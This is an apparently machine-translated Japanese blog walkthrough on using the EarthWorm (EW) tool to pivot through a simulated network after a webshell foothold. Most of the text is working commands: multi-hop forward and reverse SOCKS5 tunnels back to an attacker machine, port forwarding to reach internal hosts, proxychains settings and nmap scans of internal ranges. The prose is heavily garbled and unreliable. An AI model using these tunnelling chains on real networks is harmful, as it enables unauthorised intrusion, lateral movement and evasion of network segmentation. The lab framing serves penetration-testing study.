EWが複数の機関のネットワーク侵入シーンを使用して完了しました

EWが複数の機関のネットワーク侵入シーンを使用して完了しました

 2019年4月20日の日付の  基準、ネットワーク侵入、エージェント貫通、ポートフォワーディング 著者amm907   0コメント 

 

0x01の需要

：ネットワークへの浸潤は、多くの場合など、さらなる拡大のためにネットワークに流入する薬剤を必要とする場合

• ポートスキャン
• ポートフォワーディング
• アクセスイントラネットのWebサービス
• ......

0x02のシーン

以下は、使用シナリオをシミュレートします。

1、環境設定、ネットワークトポロジ

• A1 - 120.xxx - カリ - パブリック・ネットワーク・サーバ攻撃
• V1 - 10.10.1.111 - CentOSに - サーバネットワーク、nginxのを介して公衆網へのオープンなWebアプリケーションのポート80、のために、パブリックネットワークIPを開くことなく、パブリックネットワークは、今やウェブシェルとなっている、10.10.1ルートセグメントが到達することができます。
• V2 - 10.10.2.111 - CentOSに - イントラネットサーバーではなく、公衆網へのオープン、セクション10.10.3および10.10.1をルーティングに到達することができます。
• V3 - 10.10.3.111 - CentOSに - ネットワークサーバ、および開いていないパブリックネットワークを行い、Webアプリケーションのポート8080がある、パラグラフ10.10.2到達可能10.10.1セグメントのルートが到達不能です。

2、前提の説明

浸透は、浸透しA1 V1上のWebアプリケーションの動作は、A1にV1と反発シェルをウェブシェル得ます。そして、ネットワークの普及の中するつもり、さらにリソースがネットワーク内で見つかりました。

0x03の操作

ネットワーク内の浸透を達成するためのツールは、そのようなミミズ、シロアリ、reGeorg、NPS、ここでの動作EWシミュレートされたネットワークの主な用途として、多くのがあります。

EW（ミミズ）は SOCKSのV5サービスと携帯ネットワーク侵入ツールであり、ポートフォワーディング2つのコア機能を設定し、ネットワーク侵入は、複雑なネットワーク環境で完了することができます。
ネットワークの制限を破って、ネットワークの深さへの直接アクセス、トンネルネットワークを介して取得するために、「リバース」、「前方」「多段カスケード」することができます。

6モードがあります。

• ssocksd - フォワードプロキシ
• rcsocks - 1つのリバースプロキシ、トラフィック転送
• rssocks - 2リバースプロキシ、SOCKS5のリバウンド
• lcx_listen - 1つのリバースプロキシ、トラフィック転送
• lcx_tran - ポートフォワーディング
• lcx_slave - ポートバインディング

シーンワン：V1へのトラフィックエージェント、ネットワーク情報収集内で行います

シェルV1、最初のダウンロードの東西、SOCKS5を設定する準備ができて、プロキシローカルトラフィックを取得した後。
フォワードプロキシとリバースプロキシ：ここでは、二つの方法のどちらかを選択することができます。

フォワードエージェント：
パブリックIP（139.xxx）とターゲットマシンのV1は、進むべき道プロキシトラフィックを使用することが可能と仮定すると。
ターゲットマシンのV1とリスニングポート1080上の[スタート] SOCKS5のサービス：

./ew -s ssocksd -l 1080

そして、ターゲットマシンのV1へのプロキシトラフィックと同等の1080のプロキシポート139.xxxに流れ、そしてあなたはさらに普及するためのツールを使用することができます。
proxychainsプロキシ設定のA1：

vi /etc/proxychains.conf
[ProxyList]
socks5    139.x.x.x    1080

リバースプロキシ：
シーン目標V1無パブリックIPとして、しかし、公衆ネットワークにアクセスすることができます。具体的なアドレスが存在しないので、V1は、プロキシ接続リバウンドの流れを使用することができ、前方の接続を使用することはできません。
ローカル起動電流攻撃機A1の転送では、ポート1080からの外部トラフィックはリバウンドゴール接続用のローカルポート8888を待機に転送します：

./ew -s rcsocks -l 1080 -e 8888

[スタート] SOCKS5のターゲットマシンのV1上のサービス、および攻撃機A1の8888ポートに戻ってバウンス：

./ew -s rssocks -d 120.x.x.x -e 8888

設定ブローカチャネルは、A1は、ターゲットマシンのV1上のトラフィックのエージェントに相当しますローカルプロキシポート1080に流れます攻撃マシン上のA1 1080 8888 V1同等のアクセスポート、使用proxychainへのアクセスを完了し、かなりA1上の要求を開始していますV1の要求を開始し、その後はさらに普及するためのツールを使用することができます。
proxychainsプロキシ設定のA1：

[ProxyList]
socks5    127.0.0.1    1080

さらにA1のスキャンnmapの上の各ネットワークポート内マシンV1セグメントことが判明し、続いて：

proxychains nmap -p xxx 

-sT -Pn -open 10.10.1.111/16
注proxychainsないプロキシICMPパケットのためには、禁止ピングパラメータ-Pnを追加する（ホスト、直接TCPポートスキャンの生存するかどうかを検出していません）

スキャン結果は、22ポートおよび他の開放、ネットワークV2-10.10.2.111内到着機のセクション10.2に見出すことができる
浸潤V2する試みを、リバウンドシェルは使用前に稠密ログインV2 V1、V1に自由に設定されていることが見出されsshは、正常V2にログオン。

シーン2：V2へのトラフィック剤、さらに情報収集のために

今、パブリックネットワークトラフィックは、不合理なパブリックネットワークを明らかにしたシェルV2とV2の検査、リバースプロキシすることはできませんV1によって、マルチレベルのプロキシが必要となって。その後、エージェントは、さらに探査のためにV2に流れます。
フォワードプロキシとリバースプロキシ：ここでは、あまりにも、2つの方法があります。
フォワードエージェント：
パブリックIP（139.xxx）とターゲットマシンのV1は、進むべき道プロキシトラフィックを使用することが可能と仮定すると。
ターゲットマシンのV2とリスニングポート9999上の[スタート] SOCKS5プロキシ：

./ew -s ssocksd -l 9999

：V1、V1とV2、SOCKS5チャンネルの設立の9999ポートバインディング1080ポートで起動しトラフィック転送

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

そして、ターゲットマシンのV2上のトラフィック薬と同等の1080のプロキシポート139.xxx、に流れます。
proxychainsプロキシ設定のA1：

[ProxyList]
socks5    139.x.x.x    1080

リバースプロキシ：
転送ローカル起動フロー攻撃機でA1、前方ポート1080からのリバウンドゴール接続用のローカルポート8888を待機に外部トラフィック：

./ew -s lcx_listen -l 1080 -e 8888

EW V2への転送、およびV2は、SOCKS5エージェントのリスニングポート9999を起動します。

./ew -s ssocksd -l 9999

：V1、A1のV2、SOCKS5チャネルの確立との結合8888ポート9999ポートの最後の実行

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

設定ブローカチャネルが完了すると、1080のアクセスA1が9999 V2ポートへのアクセスに相当し、攻撃機の使用は、ターゲットマシンのV2上のトラフィックのエージェントに相当しますローカルポート1080にA1トラフィックエージェントにproxychain、とかなりA1上の要求を開始しましたV2上の要求を開始します。
proxychainsプロキシ設定のA1：

[ProxyList]
socks5    127.0.0.1    1080

その後、A1にnmapのポートスキャンを使用するには、ここさらなる浸透のためのツールを使用することができます。

proxychains nmap -p xxx -sT -Pn -open 10.10.2.111/16

スキャン結果は、ネットワークV3-10.10.3.111、オープンポート8080内のマシンの10.3セグメントに到達するように求めることができます。
10.3 10.1セグメントに到達することができませんでしV1に関する以前のスキャン結果によると、しかし、V2の踏み台で、あなたはより深く、ネットワークとアプリケーション内のマシンにアクセスすることができます。

A1ブラウザのプロキシ設定については、ローカルポート1080へのプロキシ、V2へのトラフィックエージェントは、あなたがV3にイントラネットのWebアプリケーションにアクセスすることができます。
ブラウザアクセスしようとしhttp://10.10.3.111：8080は、その後、彼らは少し、さらにウェブを貫通することができ、運用、保守管理システムを発見しました。

シーン3：と仮定シェルV3は、代理店は今V3に流入し、得られています。（三段カスケード）

フォワードエージェント：
パブリックIP（139.xxx）とターゲットマシンのV1は、進むべき道プロキシトラフィックを使用することが可能と仮定すると。
：V1、V1とV2、SOCKS5チャンネルの設立の9999ポートバインディング1080ポートで起動しトラフィック転送

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

：V2、V2とV3、SOCKS5チャンネルの設立の8888ポートバインディング9999ポートで起動しトラフィック転送

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8888

ターゲットマシンのV3およびポート8888でリッスン上の[スタート] SOCKS5プロキシ：

./ew -s ssocksd -l 8888

複数の方法：リバースプロキシのシナリオにより、V1→V3の勃起を達成することができるから、二つの方法、インチ
そして、ターゲットマシンのV3上のトラフィック薬と同等の1080のプロキシポート139.xxx、に流れます。
proxychainsプロキシ設定のA1：

[ProxyList]
socks5    139.x.x.x    1080

リバースプロキシ：
リバウンド目標接続用の攻撃機A1での実行、ローカル開始トラフィック転送、ローカルポート1080を待機に8888外部トラフィックからポート転送：

./ew -s rcsocks -l 1080 -e 8888

V1の実行では、9999ポートがV2の8888ポートA1、SOCKS5のチャネルの確立との結合します：

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

V2の実行、ローカル開始トラフィック転送、ターゲットマシンのV3リバウンド接続用のローカルポート9999と待機に7777外部トラフィックからポートフォワーディングで：

./ew -s lcx_listen -l 9999 -e 7777

ターゲットV3の実行、SOCKS5のサービスを開始し、7777ポートV2に戻ってバウンス：

./ew -s rssocks -d 10.10.2.111 -e 7777

設定ブローカチャネルが完了すると、A1ポートアクセスV3 1080へのアクセスが7777に相当し、攻撃機の使用は、ターゲットマシンのV3上のトラフィックのエージェントに相当しますローカルポート1080にA1トラフィックエージェントにproxychain、とかなりA1上の要求を開始しましたV3上の要求を開始します。
proxychainsプロキシ設定のA1：

[ProxyList]
socks5    127.0.0.1    1080

3段カスケードの下のポートフォワーディング業務：四つのシーン

EWネットワークは、ポートフォワーディング、ターゲット・マシンV3、外部ネットワークへのネットワーク上のWebアプリケーションポートエージェントをサポートしています。
フォワードエージェント：
パブリックIP（139.xxx）とターゲットマシンのV1は、進むべき道プロキシトラフィックを使用することが可能と仮定すると。
：V1、V1とV2、SOCKS5チャンネルの設立の9999ポートバインディング1080ポートで起動しトラフィック転送

./ew -s lcx_tran -l 1080 -f 10.10.2.111 -g 9999

：V2、V2とV3、SOCKS5チャンネルの設立の8080ポートバインディング9999ポートで起動しトラフィック転送

./ew -s lcx_tran -l 9999 -f 10.10.3.111 -g 8080

設定ブローカチャネルは、アクセス1080 V1 V3は、8080ポートへのアクセスに相当し、完了です。
A1アクセスブラウザhttp://139.xxx：1080、すなわちV3のイントラネットのWebアプリケーションにアクセスします。

リバースプロキシ：
A1での実行は、ローカルトラフィック転送を開始し、8888外部トラフィックからリバウンドゴール接続用のローカルポート1080を待機するポート転送：

./ew -s lcx_listen -l 1080 -e 8888

V1の実行では、9999ポートがV2の8888ポートA1、SOCKS5のチャネルの確立との結合します：

./ew -s lcx_slave -d 120.x.x.x -e 8888 -f 10.10.2.111 -g 9999

V2の実行では、トラフィックの転送を開始し、ポート結合8080 9999 V2とV3、SOCKS5のチャネルの確立のポート：

./ew -s lcx_tran -l 9999 -f 10.3.10.111 -g 8080

設定ブローカチャネルが完了し、1080年のアクセスA1は、ポートアクセスの8080 V3に相当します。
A1アクセスブラウザhttp://127.0.0.1：1080、すなわちV3のイントラネットのWebアプリケーションにアクセスします。

0x04の概要

多様な戦闘シナリオはより複雑にすることができ、比較的簡単である、上の精緻化ではない、シナリオ章の一般的なタイプをカバーしようEWの下でシナリオの4種類の基本的な使用を記載しています。
内容があまりにも多くの困難のないツールの使用に基づいて、鍵は簡単に問題を作成し、いくつかの小さなシーンに大規模、複雑なシーンを分割するために、データが流れるネットワーク内の実際のターゲットを把握することです。
紙はZhongjueを来るこの練習は不可欠です知っている、私は進歩し続けることができ、より多くの実用的な操作を考えます。